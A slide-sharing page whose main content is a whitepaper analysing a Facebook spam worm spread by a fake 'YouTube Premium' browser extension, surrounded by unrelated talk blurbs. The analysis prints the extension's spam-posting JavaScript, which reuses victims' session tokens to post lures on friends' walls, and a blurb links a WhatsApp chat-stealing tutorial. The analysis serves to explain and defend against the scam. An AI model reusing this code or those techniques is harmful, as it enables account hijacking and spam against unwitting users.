This document analyzes a Facebook spam campaign that exploited users through malicious browser extensions. The spam spread by tricking users into installing a fake "YouTube Premium" extension that stole users' cookies and used them to post spam messages on friends' walls. The document traces how the extension redirected users to a page containing a distracting video while running a script in the background to spread the spam. It concludes with tips on how to avoid similar scams by being wary of suspicious browser extensions and unsolicited promises of gifts or money online.
Adding the Awesomesauce Flavor with IE9 Pinned SitesJohn Bristowe
By now, you’ve heard about pinned sites in Internet Explorer 9. And, you’ve probably even used them yourself. But, did you know that this feature can help increase site visits and engagements by as much as 50%? In this session, you’ll hear stories of Pinned Site implementations by some of the most popular websites on the web today. You’ll also discover how to support pinned sites with a few lines of markup. Finally, you’ll learn best practices that will help you deliver an awesome experience to your visitors.
I haz your mouse clicks and key strokesAkash Mahajan
This technically light talk+demo will show you how and what are User Interface Redressing Attacks.
Web Applications using HTML5 + JavaScript + CSS + Modern Browsers are vulnerable to attacks such as Clickjacking, Strokejacking, Cursor Tracking, Unxploitable XSS and Facebook Like attacks.
TL;DR Cool demo and simple to understand explaination of ClickJacking
Adding the Awesomesauce Flavor with IE9 Pinned SitesJohn Bristowe
By now, you’ve heard about pinned sites in Internet Explorer 9. And, you’ve probably even used them yourself. But, did you know that this feature can help increase site visits and engagements by as much as 50%? In this session, you’ll hear stories of Pinned Site implementations by some of the most popular websites on the web today. You’ll also discover how to support pinned sites with a few lines of markup. Finally, you’ll learn best practices that will help you deliver an awesome experience to your visitors.
I haz your mouse clicks and key strokesAkash Mahajan
This technically light talk+demo will show you how and what are User Interface Redressing Attacks.
Web Applications using HTML5 + JavaScript + CSS + Modern Browsers are vulnerable to attacks such as Clickjacking, Strokejacking, Cursor Tracking, Unxploitable XSS and Facebook Like attacks.
TL;DR Cool demo and simple to understand explaination of ClickJacking
Step by step overview of installing flash conversion in a Drupal environment of users uploaded videos.
Given at the West Suburban Drupal Meetup,
May 21, 2009
I go over some useful and fun browser website tools that can be used to do things like get videos, video conversion to other formats, search, and a website full of OSINT tools.
Sir I want to hack whatsapp chat ? Please give me a tutorial link. This question made me to write this simple POC tutorial to hack/steal whatsapp chats
http://www.ehacking.net/2014/09/poc-tutorial-of-stealing-whatsapp-chat.html
Step by step overview of installing flash conversion in a Drupal environment of users uploaded videos.
Given at the West Suburban Drupal Meetup,
May 21, 2009
I go over some useful and fun browser website tools that can be used to do things like get videos, video conversion to other formats, search, and a website full of OSINT tools.
Sir I want to hack whatsapp chat ? Please give me a tutorial link. This question made me to write this simple POC tutorial to hack/steal whatsapp chats
http://www.ehacking.net/2014/09/poc-tutorial-of-stealing-whatsapp-chat.html
Executive Directors Chat Leveraging AI for Diversity, Equity, and InclusionTechSoup
Let’s explore the intersection of technology and equity in the final session of our DEI series. Discover how AI tools, like ChatGPT, can be used to support and enhance your nonprofit's DEI initiatives. Participants will gain insights into practical AI applications and get tips for leveraging technology to advance their DEI goals.
Unit 8 - Information and Communication Technology (Paper I).pdfThiyagu K
This slides describes the basic concepts of ICT, basics of Email, Emerging Technology and Digital Initiatives in Education. This presentations aligns with the UGC Paper I syllabus.
A review of the growth of the Israel Genealogy Research Association Database Collection for the last 12 months. Our collection is now passed the 3 million mark and still growing. See which archives have contributed the most. See the different types of records we have, and which years have had records added. You can also see what we have for the future.
Acetabularia Information For Class 9 .docxvaibhavrinwa19
Acetabularia acetabulum is a single-celled green alga that in its vegetative state is morphologically differentiated into a basal rhizoid and an axially elongated stalk, which bears whorls of branching hairs. The single diploid nucleus resides in the rhizoid.
Synthetic Fiber Construction in lab .pptxPavel ( NSTU)
Synthetic fiber production is a fascinating and complex field that blends chemistry, engineering, and environmental science. By understanding these aspects, students can gain a comprehensive view of synthetic fiber production, its impact on society and the environment, and the potential for future innovations. Synthetic fibers play a crucial role in modern society, impacting various aspects of daily life, industry, and the environment. ynthetic fibers are integral to modern life, offering a range of benefits from cost-effectiveness and versatility to innovative applications and performance characteristics. While they pose environmental challenges, ongoing research and development aim to create more sustainable and eco-friendly alternatives. Understanding the importance of synthetic fibers helps in appreciating their role in the economy, industry, and daily life, while also emphasizing the need for sustainable practices and innovation.
A workshop hosted by the South African Journal of Science aimed at postgraduate students and early career researchers with little or no experience in writing and publishing journal articles.
This slide is special for master students (MIBS & MIFB) in UUM. Also useful for readers who are interested in the topic of contemporary Islamic banking.
Introduction to AI for Nonprofits with Tapp NetworkTechSoup
Dive into the world of AI! Experts Jon Hill and Tareq Monaur will guide you through AI's role in enhancing nonprofit websites and basic marketing strategies, making it easy to understand and apply.
Biological screening of herbal drugs: Introduction and Need for
Phyto-Pharmacological Screening, New Strategies for evaluating
Natural Products, In vitro evaluation techniques for Antioxidants, Antimicrobial and Anticancer drugs. In vivo evaluation techniques
for Anti-inflammatory, Antiulcer, Anticancer, Wound healing, Antidiabetic, Hepatoprotective, Cardio protective, Diuretics and
Antifertility, Toxicity studies as per OECD guidelines
Natural birth techniques - Mrs.Akanksha Trivedi Rama University
An analysis of a facebook spam exploited through browser add-ons - Whitepaper
1. Analysis of a Facebook
spam exploited through
browser add-ons/extensions
Prajwal Panchmahalkar
panchmahalkar@gmail.com
Image courtesy : http://contactdubai.com
2. Though spam on Facebook is not new to us, however I find this particular spam leveraged
very smartly and it was a very interesting analysis to me because I was surprised to see what
extent the spammers can go. Today one of my friends on Facebook was so annoyed with this
spam which was posting on all his friends walls, which looked like this:
I was asked what to do, looking at it, it surely looked to be just like every other spam I
suggested him all the usual measures like remove all his Facebook applications that are
doubtful and clear his browser data. But it continued even after that so I decided to look into
it.
First the URL, the spam seems to be originated from http:// nwuuwiwiwiw.blogspot.com/,
looking at the blog it looked like this,
Interesting! Needs a Divx plug-in however asks to install a YouTube Premium plugin
(wonder what a “premium” for YouTube would be!!).
3. So decided to look into the page source, here is what it contained:
So this would install the browser add-on/extension based on the browser, the else part of the
code made sense to me as it has to go further if the browser is not Firefox or Chrome, let’s
look into the php of the else part later. I downloaded the Firefox “YouTube” add-on and
extracted it; the youtube.js was one to look into:
Ah, http://mieneeueueu.co.cc/yt/script.js a remote script
4. Navigating to it I found
Another script at http://mieneeueueu.co.cc/yt/extra.js finally this was the Final script ;)
Now let’s analyze this script,
Remember the else part earlier in the first code snippet which I promised to discuss later? It
contained a link http://mieneeueueu.co.cc/yt/video.php now the file extra.js also contains this
part to redirect the user to this URL after the installation of the add-on/extension, navigating
to that link I found
This page actually contained that video embedded; finally the person must be happy to see
this video (however comments at the bottom are not real it’s an image, stupid and smart) ;)
5. As the person views the video and finishes it, this script stealing the browser cookies gets
enough time to spread the spam on all the friends’ walls
Further analyzing the code,
The code here assigns some random variables for the post so that it won’t be similar on all the
walls. So using all the variables post_form_id to var p3 make large combinations (use of
mathematical combinations, smart eh?).
Looking into the main part of the code where the message is generated and sent for post
for (var f = 0; f < b; f++) {
if (a['payload']['entries'][f]['uid'] != user_id) {
message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0,
a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' ');
var g = new XMLHttpRequest();
d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
title = '[VIDEO] Yeahh!! It happens on Live Television!';
summary = 'Lol Checkout this video its very embracing moment for her';
imagen = 'http://i.imgur.com/f9PE7.jpg';
e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] +
'&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UI
ThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' +
randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) +
'&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title
+
'&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]
=' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) +
'&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' +
6. Math['random']() +
'&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][im
ages][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-
1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][exp
ires]=41647446&attachment[params][images][0]=' + imagen +
'&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&
xhpc_message_text=' + message + '&xhpc_message=' + message +
'&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&pri
vacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
g['open']('POST', d, true);
g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
g['setRequestHeader']('Content-length', e['length']);
g['setRequestHeader']('Connection', 'keep-alive');
g['onreadystatechange'] = function () {};
g['send'](e);
Looking into the above snippet of code it is clear that it uses the grabbed cookies to post the
spam on others walls, this script also contained an unfinished part left out (may be the
spammer was happy with this for now or grab some time from the user to finish the spam
effectively) with a link to http://rihannaxgirlzke.blogspot.com/ which looked like,
However looking into the source it didn’t contain any script or rather it was a static page with
the content actually an image file.
7. Conclusion:
Though social networking sites often fall prey to such scams/spams it is much of users
consent due to their ignorance. Most of the times looking at the posts makes it analyze if it is
genuine video from a valid link, in this case,
1. Looking at the post the link from where the post originated is clearly youtube.com
(underlined black)
2. Further the thumbnail preview for videos has been changed the play button now is
transparent black while the one in the spam we discussed had a blue play button
(underlined red)
3. Always install extensions from known sources
a. Chrome – from chrome store
b. Firefox – Mozilla add-ons
4. Use add-ons like no-script, No-Ads to avoid such scripts.
5. Stay away from scams/spams that promise to provide some gift or money.